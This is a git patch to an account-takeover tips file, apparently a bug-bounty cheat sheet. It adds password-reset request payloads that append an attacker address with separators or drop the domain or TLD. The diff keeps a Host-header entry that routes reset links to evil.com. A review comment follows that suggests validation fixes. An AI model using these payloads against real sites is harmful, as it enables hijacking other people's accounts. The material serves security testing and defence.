From 35198d15d78e77da5add8e29a538e25c477b784b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Thu, 3 Sep 2020 21:04:19 +0700 Subject: [PATCH] Account Takover [2] Add 3 tips --- AccountTakeover.md | 33 ++++++++++++++++++++++++++++++++- 1 file changed, 32 insertions(+), 1 deletion(-) diff --git a/AccountTakeover.md b/AccountTakeover.md index ecda1fb..2508254 100644 --- a/AccountTakeover.md +++ b/AccountTakeover.md @@ -21,4 +21,35 @@ Host: evil.com [...] email=victim@mail.com ``` -And the victim will receive the reset link with your evil.com +And the victim will receive the reset link with evil.com + +4. Using separator in value of the parameter +``` +POST /reset +[...] +email=victim@mail.com,hacker@mail.com +``` +``` +POST /reset +[...] +email=victim@mail.com%20hacker@mail.com +``` +``` +POST /reset +[...] +email=victim@mail.com|hacker@mail.com +``` + +5. No domain in value of the paramter +``` +POST /reset +[...] +email=victim +``` + +6. No TLD in value of the paramter +``` +POST /reset +[...] +email=victim@mail +```
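Review bot: the new headings for tips 5 and 6 misspell "parameter" as "paramter" (`+5. No domain in value of the paramter`, `+6. No TLD in value of the paramter`), and the commit subject has "Takover" for "Takeover"; please fix both before merge. On content, each added tip gives only the request shape and says nothing about what result indicates the weakness or how to close it, unlike the Host-header entry this hunk edits, which at least states the outcome ("the victim will receive the reset link with evil.com"). Suggest a one-line outcome and fix under each: for tip 4, the weakness is present only if the reset mail is also delivered to the second address, and the fix is to parse the submitted value as exactly one address, reject separators (`,`, `%20`, `|`), and send the link only to the address stored for the matched account rather than the value echoed from the request; for tips 5 and 6, the fix is strict address validation (require `@` and a dotted domain) before any lookup or mail send.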